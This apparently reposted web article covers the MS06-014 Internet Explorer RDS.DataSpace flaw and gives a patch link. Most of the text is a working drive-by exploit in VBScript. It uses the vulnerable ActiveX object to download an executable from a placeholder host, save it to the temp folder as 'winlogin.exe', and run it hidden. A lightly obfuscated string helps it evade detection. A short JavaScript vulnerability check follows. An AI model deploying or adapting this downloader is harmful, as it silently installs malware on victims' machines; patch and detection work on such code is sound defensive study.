Please execute the following code to test whether your machine is vulnerable:
]
Patch download: http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
The vbs code of the related virus is as follows:
The code is as follows:
on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F .BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell. Application","")
Q.ShellExecute fname1,"","","open",0
<script>
try
{
var Dts = new ActiveXObject("RDS.DataSpace");
var Stm = Dts.CreateObject("Microsoft.XmlHttp","");
alert("您的机器存在漏洞,请及时打上补丁。");
}
catch(err)
{
alert("您的机器不存在该漏洞:" + err.message);
}
</script>
Statement:The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn